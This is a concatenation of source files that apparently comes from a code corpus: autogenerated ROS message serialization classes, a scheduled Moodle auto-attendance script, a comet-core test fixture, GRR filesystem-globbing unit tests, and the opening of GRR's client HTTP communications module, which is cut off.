_has_header = False #flag to mark the presence of a Header object
_full_text = """
string topic_name
uint8 pin
uint8 value
uint8 rate
"""
__slots__ = ['topic_name','pin','value','rate']
_slot_types = ['string','uint8','uint8','uint8']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
topic_name,pin,value,rate
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SetupChannelRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.topic_name is None:
self.topic_name = ''
if self.pin is None:
self.pin = 0
if self.value is None:
self.value = 0
if self.rate is None:
self.rate = 0
else:
self.topic_name = ''
self.pin = 0
self.value = 0
self.rate = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.topic_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_3B.pack(_x.pin, _x.value, _x.rate))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
_x = self
start = end
end += 3
(_x.pin, _x.value, _x.rate,) = _struct_3B.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self.topic_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_3B.pack(_x.pin, _x.value, _x.rate))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.topic_name = str[start:end].decode('utf-8')
else:
self.topic_name = str[start:end]
_x = self
start = end
end += 3
(_x.pin, _x.value, _x.rate,) = _struct_3B.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_3B = struct.Struct("<3B")
"""autogenerated by genpy from arbotix_msgs/SetupChannelResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SetupChannelResponse(genpy.Message):
_md5sum = "d41d8cd98f00b204e9800998ecf8427e"
_type = "arbotix_msgs/SetupChannelResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
"""
__slots__ = []
_slot_types = []
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SetupChannelResponse, self).__init__(*args, **kwds)
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
class SetupChannel(object):
_type = 'arbotix_msgs/SetupChannel'
_md5sum = 'c65e58d8b3b4d406126f6dc829a6011f'
_request_class = SetupChannelRequest
_response_class = SetupChannelResponse
``` |
{
"source": "4ndu-7h4k/MoodleAutoAttedence",
"score": 3
} |
#### File: MoodleAutoAttedence/moodle/__main__.py
```python
from moodle import log, ENDC, GREEN, WARNING, START_TIME, END_TIME, CYAN, RED
from urllib.parse import urlparse, parse_qs
from moodle.attendence import attendence
from moodle.telegrambot import send
from bs4 import BeautifulSoup
from datetime import datetime
from pytz import timezone
import schedule, time
import requests
format = "%I:%M:%S"
def banner():
"""
Banner
"""
print(
f"{CYAN} ██████ ██████ █████ ████ \n \
░░██████ ██████ ░░███ ░░███ \n \
░███░█████░███ ██████ ██████ ███████ ░███ ██████ \n \
░███░░███ ░███ ███░░███ ███░░███ ███░░███ ░███ ███░░███\n \
░███ ░░░ ░███ ░███ ░███░███ ░███░███ ░███ ░███ ░███████ \n \
░███ ░███ ░███ ░███░███ ░███░███ ░███ ░███ ░███░░░ \n \
█████ █████░░██████ ░░██████ ░░████████ █████░░██████ \n \
░░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░░░░ ░░░░░ ░░░░░░ {ENDC}"
)
def loophour():
schedule.every(30).minutes.until(END_TIME).do(check)
def check():
now_utc = datetime.now(timezone("UTC"))
now_asia = now_utc.astimezone(timezone("Asia/Kolkata"))
log.info(
f"{WARNING}{now_asia.strftime(format)} : Attendence checking for all Courses{ENDC}\n\n"
)
k = 1
while k <= 4:
for name, url in m.set_course_list(m.get_course()).items():
m.mark_attedence(m.get_attendence_url(url)[0], name)
if m.tcount == m.tcourse:
k += 1
m.tcount = 0
now_utc = datetime.now(timezone("UTC"))
now_asia = now_utc.astimezone(timezone("Asia/Kolkata"))
log.info(
f"{now_asia.strftime(format)} : All classes don't have attendence now!"
)
if k == 4:
send("No classes found now , please check manually")
break
log.info(f"Waiting,{3*k} minutes to check again\n\n")
time.sleep(180)
log.info(f"Checking attendence again, after {3*k} minutes")
else:
m.tcount = 0
break
if __name__ == "__main__":
banner()
m = attendence()
if m.login():
log.info(f"{GREEN}Moodle Session Started{ENDC}")
else:
log.error(f"{RED}Unable to login check the credential, or sever is down{ENDC}")
exit()
log.info(f"Attedence checking for all course ")
if not schedule.get_jobs():
try:
log.debug(schedule.every(30).minutes.until(END_TIME).do(check))
except Exception:
log.error("30 minute scheduler stoped, no class after 3.30")
log.debug(schedule.every().monday.at(START_TIME).do(loophour))
log.debug(schedule.every().tuesday.at(START_TIME).do(loophour))
log.debug(schedule.every().wednesday.at(START_TIME).do(loophour))
log.debug(schedule.every().thursday.at(START_TIME).do(loophour))
log.debug(schedule.every().friday.at(START_TIME).do(loophour))
check()
while True:
schedule.run_pending()
time.sleep(1)
``` |
{
"source": "4ndygu/comet-core",
"score": 2
} |
#### File: comet-core/tests/conftest.py
```python
import os
from comet_core import Comet
import pytest
@pytest.fixture
def app():
yield Comet()
@pytest.fixture
def test_db():
"""Setup a test database fixture
Yields:
DataStore: a sqlite backed datastore with all test data
"""
from comet_core.data_store import DataStore
from tests.utils import get_all_test_messages
data_store = DataStore('sqlite://')
for event in get_all_test_messages(parsed=True):
data_store.add_record(event.get_record())
yield data_store
``` |
{
"source": "4ndygu/grr",
"score": 2
} |
#### File: client_actions/file_finder_utils/globbing_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import os
import shutil
import unittest
from absl.testing import absltest
from builtins import zip # pylint: disable=redefined-builtin
from grr_response_client.client_actions.file_finder_utils import globbing
from grr_response_core.lib import flags
from grr_response_core.lib.util import temp
from grr.test_lib import test_lib
# TODO(hanuszczak): Consider refactoring these tests with `pyfakefs`.
class DirHierarchyTestMixin(object):
def setUp(self):
super(DirHierarchyTestMixin, self).setUp()
self.tempdir = temp.TempDirPath()
def tearDown(self):
super(DirHierarchyTestMixin, self).tearDown()
shutil.rmtree(self.tempdir)
def Path(self, *components):
return os.path.join(self.tempdir, *components)
def Touch(self, *components):
filepath = self.Path(*components)
dirpath = os.path.dirname(filepath)
try:
if not os.path.exists(dirpath):
os.makedirs(dirpath)
with io.open(filepath, "a"):
pass
except UnicodeEncodeError:
# TODO(hanuszczak): Make sure that Python 3 also throws the same error
# in case of unsupported unicodes in the filesystem. In general this
# exception being thrown feels very fishy.
raise unittest.SkipTest("Unicode not supported by the filesystem")
class RecursiveComponentTest(DirHierarchyTestMixin, absltest.TestCase):
def testSimple(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("baz", "0")
self.Touch("baz", "1")
component = globbing.RecursiveComponent()
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
self.Path("foo", "bar", "0"),
self.Path("baz"),
self.Path("baz", "0"),
self.Path("baz", "1"),
])
results = list(component.Generate(self.Path("foo")))
self.assertCountEqual(results, [
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
self.Path("foo", "bar", "0"),
])
results = list(component.Generate(self.Path("baz")))
self.assertCountEqual(results, [
self.Path("baz", "0"),
self.Path("baz", "1"),
])
results = list(component.Generate(self.Path("foo", "bar")))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
])
def testMaxDepth(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("foo", "bar", "baz", "0")
component = globbing.RecursiveComponent(max_depth=3)
results = list(component.Generate(self.Path()))
# Files at level lesser than 3 should be included.
self.assertIn(self.Path("foo"), results)
self.assertIn(self.Path("foo", "0"), results)
self.assertIn(self.Path("foo", "1"), results)
self.assertIn(self.Path("foo", "bar"), results)
# Files at level equal to 3 should be included.
self.assertIn(self.Path("foo", "bar", "0"), results)
self.assertIn(self.Path("foo", "bar", "baz"), results)
# Files at level bigger that 3 should not be included.
self.assertNotIn(self.Path("foo", "bar", "baz", "0"), results)
def testIgnore(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("bar", "0")
self.Touch("bar", "quux", "0")
self.Touch("bar", "quux", "1")
self.Touch("baz", "0")
self.Touch("baz", "1")
self.Touch("baz", "quux", "0")
opts = globbing.PathOpts(recursion_blacklist=[
self.Path("foo"),
self.Path("bar", "quux"),
])
component = globbing.RecursiveComponent(opts=opts)
results = list(component.Generate(self.Path()))
# Recursion should not visit into the blacklisted folders.
self.assertNotIn(self.Path("foo", "0"), results)
self.assertNotIn(self.Path("foo", "1"), results)
self.assertNotIn(self.Path("bar", "quux", "0"), results)
self.assertNotIn(self.Path("bar", "quux", "1"), results)
# Blacklisted folders themselves should appear in the results.
self.assertIn(self.Path("foo"), results)
self.assertIn(self.Path("bar", "quux"), results)
# Recursion should visit not blacklisted folders.
self.assertIn(self.Path("baz"), results)
self.assertIn(self.Path("baz", "0"), results)
self.assertIn(self.Path("baz", "1"), results)
self.assertIn(self.Path("baz", "quux"), results)
self.assertIn(self.Path("baz", "quux", "0"), results)
def testFollowLinks(self):
self.Touch("foo", "0")
self.Touch("foo", "bar", "0")
self.Touch("foo", "baz", "0")
self.Touch("foo", "baz", "1")
self.Touch("quux", "0")
self.Touch("norf", "0")
os.symlink(self.Path("foo", "bar"), self.Path("quux", "bar"))
os.symlink(self.Path("foo", "baz"), self.Path("quux", "baz"))
os.symlink(self.Path("quux"), self.Path("norf", "quux"))
opts = globbing.PathOpts(follow_links=True)
component = globbing.RecursiveComponent(opts=opts)
# It should resolve two links and recur to linked directories.
results = list(component.Generate(self.Path("quux")))
self.assertCountEqual(results, [
self.Path("quux", "0"),
self.Path("quux", "bar"),
self.Path("quux", "bar", "0"),
self.Path("quux", "baz"),
self.Path("quux", "baz", "0"),
self.Path("quux", "baz", "1"),
])
# It should resolve symlinks recursively.
results = list(component.Generate(self.Path("norf")))
self.assertCountEqual(results, [
self.Path("norf", "0"),
self.Path("norf", "quux"),
self.Path("norf", "quux", "0"),
self.Path("norf", "quux", "bar"),
self.Path("norf", "quux", "bar", "0"),
self.Path("norf", "quux", "baz"),
self.Path("norf", "quux", "baz", "0"),
self.Path("norf", "quux", "baz", "1"),
])
opts = globbing.PathOpts(follow_links=False)
component = globbing.RecursiveComponent(opts=opts)
# It should list symlinks but should not recur to linked directories.
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("foo", "0"),
self.Path("foo", "bar"),
self.Path("foo", "bar", "0"),
self.Path("foo", "baz"),
self.Path("foo", "baz", "0"),
self.Path("foo", "baz", "1"),
self.Path("quux"),
self.Path("quux", "0"),
self.Path("quux", "bar"),
self.Path("quux", "baz"),
self.Path("norf"),
self.Path("norf", "0"),
self.Path("norf", "quux"),
])
def testInvalidDirpath(self):
component = globbing.RecursiveComponent()
results = list(component.Generate("/foo/bar/baz"))
self.assertCountEqual(results, [])
class GlobComponentTest(DirHierarchyTestMixin, absltest.TestCase):
def testLiterals(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("baz")
component = globbing.GlobComponent("foo")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
])
component = globbing.GlobComponent("bar")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("bar"),
])
def testStar(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("baz")
self.Touch("quux")
component = globbing.GlobComponent("*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("bar"),
self.Path("baz"),
self.Path("quux"),
])
component = globbing.GlobComponent("ba*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("bar"),
self.Path("baz"),
])
def testQuestionmark(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("baz")
self.Touch("barg")
component = globbing.GlobComponent("ba?")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("bar"),
self.Path("baz"),
])
def testSimpleClass(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("baz")
self.Touch("baf")
component = globbing.GlobComponent("ba[rz]")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("baz"),
self.Path("bar"),
])
def testRangeClass(self):
self.Touch("foo")
self.Touch("8AR")
self.Touch("bar")
self.Touch("4815162342")
self.Touch("quux42")
component = globbing.GlobComponent("[a-z]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("bar"),
self.Path("quux42"),
])
component = globbing.GlobComponent("[0-9]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("8AR"),
self.Path("4815162342"),
])
component = globbing.GlobComponent("*[0-9]")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("4815162342"),
self.Path("quux42"),
])
def testMultiRangeClass(self):
self.Touch("f00")
self.Touch("b4R")
self.Touch("8az")
self.Touch("quux")
component = globbing.GlobComponent("[a-z][a-z0-9]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("f00"),
self.Path("b4R"),
self.Path("quux"),
])
def testComplementationClass(self):
self.Touch("foo")
self.Touch("bar")
self.Touch("123")
component = globbing.GlobComponent("*[!0-9]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("bar"),
])
def testCornerCases(self):
self.Touch("[")
self.Touch("-")
self.Touch("]")
self.Touch("!")
self.Touch("*")
self.Touch("?")
self.Touch("foo")
component = globbing.GlobComponent("[][-]")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("["),
self.Path("-"),
self.Path("]"),
])
component = globbing.GlobComponent("[!]f-]*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("["),
self.Path("*"),
self.Path("!"),
self.Path("?"),
])
component = globbing.GlobComponent("[*?]")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("*"),
self.Path("?"),
])
def testWhitespace(self):
self.Touch("foo bar")
self.Touch(" ")
self.Touch("quux")
component = globbing.GlobComponent("* *")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo bar"),
self.Path(" "),
])
def testCaseInsensivity(self):
self.Touch("foo")
self.Touch("BAR")
self.Touch("BaZ")
self.Touch("qUuX")
component = globbing.GlobComponent("b*")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("BAR"),
self.Path("BaZ"),
])
component = globbing.GlobComponent("quux")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("qUuX"),
])
component = globbing.GlobComponent("FoO")
results = list(component.Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("foo"),
])
def testUnicodeGlobbing(self):
self.Touch("ścieżka")
self.Touch("dróżka")
results = list(globbing.GlobComponent("ścieżka").Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("ścieżka"),
])
results = list(globbing.GlobComponent("dróżka").Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("dróżka"),
])
results = list(globbing.GlobComponent("*żka").Generate(self.Path()))
self.assertCountEqual(results, [
self.Path("ścieżka"),
self.Path("dróżka"),
])
def testUnicodeSubfolderGlobbing(self):
self.Touch("zbiór", "podścieżka")
self.Touch("zbiór", "poddróżka")
results = list(globbing.GlobComponent("*").Generate(self.Path("zbiór")))
self.assertCountEqual(results, [
self.Path("zbiór", "podścieżka"),
self.Path("zbiór", "poddróżka"),
])
class CurrentComponentTest(DirHierarchyTestMixin, absltest.TestCase):
def testSimple(self):
self.Touch("foo", "bar", "0")
self.Touch("foo", "baz", "0")
component = globbing.CurrentComponent()
results = list(component.Generate(self.Path("foo")))
self.assertCountEqual(results, [self.Path("foo")])
results = list(component.Generate(self.Path("foo", "bar")))
self.assertCountEqual(results, [self.Path("foo", "bar")])
results = list(component.Generate(self.Path("foo", "baz")))
self.assertCountEqual(results, [self.Path("foo", "baz")])
class ParentComponentTest(DirHierarchyTestMixin, absltest.TestCase):
def testSimple(self):
self.Touch("foo", "0")
self.Touch("foo", "bar", "0")
self.Touch("foo", "bar", "baz", "0")
component = globbing.ParentComponent()
results = list(component.Generate(self.Path("foo")))
self.assertCountEqual(results, [self.Path()])
results = list(component.Generate(self.Path("foo", "bar")))
self.assertCountEqual(results, [self.Path("foo")])
results = list(component.Generate(self.Path("foo", "bar", "baz")))
self.assertCountEqual(results, [self.Path("foo", "bar")])
class ParsePathItemTest(absltest.TestCase):
def testRecursive(self):
component = globbing.ParsePathItem("**")
self.assertIsInstance(component, globbing.RecursiveComponent)
self.assertEqual(component.max_depth, 3)
def testRecursiveWithDepth(self):
component = globbing.ParsePathItem("**42")
self.assertIsInstance(component, globbing.RecursiveComponent)
self.assertEqual(component.max_depth, 42)
def testGlob(self):
component = globbing.ParsePathItem("foo*")
self.assertIsInstance(component, globbing.GlobComponent)
component = globbing.ParsePathItem("*")
self.assertIsInstance(component, globbing.GlobComponent)
component = globbing.ParsePathItem("foo ba?")
self.assertIsInstance(component, globbing.GlobComponent)
def testCurrent(self):
component = globbing.ParsePathItem(os.path.curdir)
self.assertIsInstance(component, globbing.CurrentComponent)
def testParent(self):
component = globbing.ParsePathItem(os.path.pardir)
self.assertIsInstance(component, globbing.ParentComponent)
def testMalformed(self):
with self.assertRaises(ValueError):
globbing.ParsePathItem("foo**")
with self.assertRaises(ValueError):
globbing.ParsePathItem("**10bar")
class ParsePathTest(absltest.TestCase):
def assertAreInstances(self, instances, classes):
for instance, clazz in zip(instances, classes):
self.assertIsInstance(instance, clazz)
self.assertLen(instances, len(classes))
def testSimple(self):
path = os.path.join("foo", "**", "ba*")
components = list(globbing.ParsePath(path))
self.assertAreInstances(components, [
globbing.GlobComponent,
globbing.RecursiveComponent,
globbing.GlobComponent,
])
path = os.path.join("foo", os.path.curdir, "bar", "baz", os.path.pardir)
components = list(globbing.ParsePath(path))
self.assertAreInstances(components, [
globbing.GlobComponent,
globbing.CurrentComponent,
globbing.GlobComponent,
globbing.GlobComponent,
globbing.ParentComponent,
])
def testMultiRecursive(self):
path = os.path.join("foo", "**", "bar", "**", "baz")
with self.assertRaises(ValueError):
list(globbing.ParsePath(path))
class ExpandGroupsTest(absltest.TestCase):
def testSimple(self):
path = "fooba{r,z}"
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, [
"foobar",
"foobaz",
])
def testMultiple(self):
path = os.path.join("f{o,0}o{bar,baz}", "{quux,norf}")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, [
os.path.join("foobar", "quux"),
os.path.join("foobar", "norf"),
os.path.join("foobaz", "quux"),
os.path.join("foobaz", "norf"),
os.path.join("f0obar", "quux"),
os.path.join("f0obar", "norf"),
os.path.join("f0obaz", "quux"),
os.path.join("f0obaz", "norf"),
])
def testMany(self):
path = os.path.join("foo{bar,baz,quux,norf}thud")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, [
os.path.join("foobarthud"),
os.path.join("foobazthud"),
os.path.join("fooquuxthud"),
os.path.join("foonorfthud"),
])
def testEmpty(self):
path = os.path.join("foo{}bar")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo{}bar"])
def testSingleton(self):
path = os.path.join("foo{bar}baz")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo{bar}baz"])
def testUnclosed(self):
path = os.path.join("foo{bar")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo{bar"])
path = os.path.join("foo}bar")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo}bar"])
def testEscaped(self):
path = os.path.join("foo\\{baz}bar")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foo\\{baz}bar"])
def testNoGroup(self):
path = os.path.join("foobarbaz")
results = list(globbing.ExpandGroups(path))
self.assertCountEqual(results, ["foobarbaz"])
class ExpandGlobsTest(DirHierarchyTestMixin, absltest.TestCase):
def testWildcards(self):
self.Touch("foo", "bar", "0")
self.Touch("foo", "baz", "1")
self.Touch("foo", "norf", "0")
self.Touch("quux", "bar", "0")
self.Touch("quux", "baz", "0")
self.Touch("quux", "norf", "0")
path = self.Path("*", "ba?", "0")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("quux", "bar", "0"),
self.Path("quux", "baz", "0"),
])
def testRecursion(self):
self.Touch("foo", "bar", "baz", "0")
self.Touch("foo", "bar", "0")
self.Touch("foo", "quux", "0")
self.Touch("foo", "quux", "1")
path = self.Path("foo", "**", "0")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "baz", "0"),
self.Path("foo", "bar", "0"),
self.Path("foo", "quux", "0"),
])
def testMixed(self):
self.Touch("foo", "bar", "0")
self.Touch("norf", "bar", "0")
self.Touch("norf", "baz", "0")
self.Touch("norf", "baz", "1")
self.Touch("norf", "baz", "7")
self.Touch("quux", "bar", "0")
self.Touch("quux", "baz", "1")
self.Touch("quux", "baz", "2")
path = self.Path("**", "ba?", "[0-2]")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("norf", "bar", "0"),
self.Path("norf", "baz", "0"),
self.Path("norf", "baz", "1"),
self.Path("quux", "bar", "0"),
self.Path("quux", "baz", "1"),
self.Path("quux", "baz", "2"),
])
def testEmpty(self):
with self.assertRaises(ValueError):
list(globbing.ExpandGlobs(""))
def testRelative(self):
with self.assertRaises(ValueError):
list(globbing.ExpandGlobs(os.path.join("foo", "bar")))
def testCurrent(self):
self.Touch("foo", "bar", "0")
self.Touch("foo", "bar", "1")
self.Touch("quux", "bar", "0")
path = self.Path("foo", os.path.curdir, "bar", "*")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("foo", "bar", "1"),
])
path = self.Path(os.path.curdir, "*", "bar", "0")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("quux", "bar", "0"),
])
def testParent(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("bar", "0")
path = self.Path("foo", "*")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
])
path = self.Path("foo", os.path.pardir, "*")
results = list(globbing.ExpandGlobs(path))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("bar"),
])
class ExpandPathTest(DirHierarchyTestMixin, absltest.TestCase):
def testGlobAndGroup(self):
self.Touch("foo", "bar", "0")
self.Touch("foo", "bar", "1")
self.Touch("foo", "baz", "0")
self.Touch("foo", "baz", "1")
self.Touch("foo", "quux", "0")
self.Touch("foo", "quux", "1")
path = self.Path("foo/ba{r,z}/*")
results = list(globbing.ExpandPath(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("foo", "bar", "1"),
self.Path("foo", "baz", "0"),
self.Path("foo", "baz", "1"),
])
path = self.Path("foo/ba*/{0,1}")
results = list(globbing.ExpandPath(path))
self.assertCountEqual(results, [
self.Path("foo", "bar", "0"),
self.Path("foo", "bar", "1"),
self.Path("foo", "baz", "0"),
self.Path("foo", "baz", "1"),
])
def testRecursiveAndGroup(self):
self.Touch("foo", "0")
self.Touch("foo", "1")
self.Touch("foo", "bar", "0")
self.Touch("foo", "baz", "quux", "0")
path = self.Path("foo/**")
results = list(globbing.ExpandPath(path))
self.assertCountEqual(results, [
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
self.Path("foo", "baz"),
self.Path("foo", "bar", "0"),
self.Path("foo", "baz", "quux"),
self.Path("foo", "baz", "quux", "0"),
])
path = self.Path("foo/{.,**}")
results = list(globbing.ExpandPath(path))
self.assertCountEqual(results, [
self.Path("foo"),
self.Path("foo", "0"),
self.Path("foo", "1"),
self.Path("foo", "bar"),
self.Path("foo", "baz"),
self.Path("foo", "bar", "0"),
self.Path("foo", "baz", "quux"),
self.Path("foo", "baz", "quux", "0"),
])
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: client/grr_response_client/comms.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import collections
import logging
import os
import pdb
import posixpath
import signal
import sys
import threading
import time
import traceback
from builtins import range # pylint: disable=redefined-builtin
import psutil
import queue
import requests
from grr_response_client import actions
from grr_response_client import client_stats
from grr_response_client import client_utils
from grr_response_client.client_actions import admin
from grr_response_core import config
from grr_response_core.lib import communicator
from grr_response_core.lib import flags
from grr_response_core.lib import queues
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import type_info
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_core.stats import stats_collector_instance
class HTTPObject(object):
"""Data returned from a HTTP connection."""
def __init__(self, url="", data="", proxy="", code=500, duration=0):
self.url = url
self.data = data
self.proxy = proxy
self.code = code
# Contains the decoded data from the 'control' endpoint.
self.messages = self.source = self.nonce = None
self.duration = duration
def Success(self):
"""Returns if the request was successful."""
return self.code in (200, 406)
class HTTPManager(object):
"""A manager for all HTTP/S connections.
NOTE: This HTTPManager is not thread safe and should not be shared between
threads.
"""
# If the client encounters this many connection errors, it searches
# for a new proxy/server url combination.
retry_error_limit = 10
# If the client encounters this many connection errors, it exits and
# restarts. Retries are one minute apart.
connection_error_limit = 60 * 24
def __init__(self, heart_beat_cb=None):
self.heart_beat_cb = heart_beat_cb
self.proxies = self._GetProxies()
self.base_urls = self._GetBaseURLs()
# We start checking with this proxy.
self.last_proxy_index = 0
self.last_base_url_index = 0
# If we have connected previously but now suddenly fail to connect, we try
# the connection a few times (retry_error_limit) before we determine
# that it is failed.
self.consecutive_connection_errors = 0
self.active_base_url = None
self.error_poll_min = config.CONFIG["Client.error_poll_min"]
def _GetBaseURLs(self):
"""Gathers a list of base URLs we will try."""
result = config.CONFIG["Client.server_urls"]
if not result:
# Backwards compatibility - deduce server_urls from Client.control_urls.
for control_url in config.CONFIG["Client.control_urls"]:
result.append(posixpath.dirname(control_url) + "/")
# Check the URLs for trailing /. This traps configuration errors.
for url in result:
if not url.endswith("/"):
raise RuntimeError("Bad URL: %s URLs must end with /" % url)
return result
def _GetProxies(self):
"""Gather a list of proxies to use."""
